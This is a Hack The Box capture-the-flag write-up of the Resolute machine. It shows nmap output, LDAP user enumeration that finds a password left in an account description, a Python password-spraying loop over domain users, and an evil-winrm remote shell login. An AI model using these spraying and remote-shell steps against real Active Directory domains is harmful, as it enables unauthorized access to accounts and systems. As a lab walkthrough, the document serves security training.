HTB Write-up | Resolute

The retired machine can be found here.
Official write-up can be downloaded here.

I started with some basic scanning with nmap that found that most likely this machine was a Domain Controller, since it had all the required ports open.

$ nmap -sC -sV 10.10.10.169 -Pn

53/tcp open domain?
| fingerprint-strings:
    | DNSVersionBindReqTCP:
        | version
        |_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2019-12-21 22:13:06Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49860/tcp open tcpwrapped
49907/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data.
If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :

SF-Port53-TCP:
     V=7.80%
     I=7%
     D=12/21%
     Time=5DFE9733%
     P=x86_64-apple-darwin17.7.0
     SF:%r(DNSVersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07v
     SF:ersion\x04bind\0\0\x10\0\x03");

Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h47m28s, deviation: 4h37m09s, median: 7m27s
| smb-os-discovery:
     | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
     | Computer name: Resolute
     | NetBIOS computer name: RESOLUTE\x00
     | Domain name: megabank.local
     | Forest name: megabank.local
     | FQDN: Resolute.megabank.local
     |_ System time: 2019-12-21T14:13:46-08:00
| smb-security-mode:
     | account_used: <blank>
     | authentication_level: user
     | challenge_response: supported
     |_ message_signing: required
| smb2-security-mode:
     | 2.02:
     |_ Message signing enabled and required
| smb2-time:
     | date: 2019-12-21T22:13:45
     |_ start_date: 2019-12-21T21:06:24

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 206.55 seconds

This enumeration also revealed that the machine's name is Resolute and the Domain/Forest name is megabank.local.

Since we think this machine is a Domain Controller, we try to enumerate the users in the Domain using the windapsearch.py script.

windapsearch is a Python script to help enumerate users, groups and computers from a Windows domain through LDAP queries. By default, Windows Domain Controllers support basic LDAP operations through port 389/tcp. With any valid domain account (regardless of privileges), it is possible to perform LDAP queries against a domain controller for any AD related information.
python2 ./windapsearch.py -d Resolute.megabank.local --dc-ip 10.10.10.169 --full --attrs 'badPwdCount,lastLogon' --users

This allowed us to find a list with details about all users including full name and description. Here, we came across something very interesting:

userPrincipalName: marko@megabank.local
displayName: Marko Novak
description: Account created. Password set to Welcome123!

So, we tried to use this password to authenticate marko using the same script:

python2 ./windapsearch.py -d Resolute.megabank.local --dc-ip 10.10.10.169 --user marko@megabank.local --password Welcome123!

Since this failed, we tried to use the same password to authenticate the other known users:

import os

names = [ 'ryan', 'marko', 'sunita', 'abigail', 'marcus', 'sally', 'fred', 'angela', 'felicia', 'gustavo', 'ulf', 'stevie', 'claire', 'paulo', 'steve', 'annette', 'annika', 'per', 'claude', 'melanie', 'zach', 'simon', 'naoki' ]

for name in names:
    full_usr = name + '@megabank.local'
    print('Trying password Welcome123! with user ' + full_usr)
    os.system('python2 windapsearch.py -d Resolute.megabank.local --dc-ip 10.10.10.169 --user ' + full_usr  + ' --password Welcome123!')

This succeeded for melanie:

Trying password Welcome123! with user melanie@megabank.local
[+] Using Domain Controller at: 10.10.10.169
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=megabank,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] u:MEGABANK\melanie

[*] Bye!

As you can see, we're being booted out from the machine as soon as we authenticate, which we were able to surpass using evil-winrm:

$ ruby evil-winrm.rb -i 10.10.10.169 -u melanie@megabank.local -p 'Welcome123!'

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt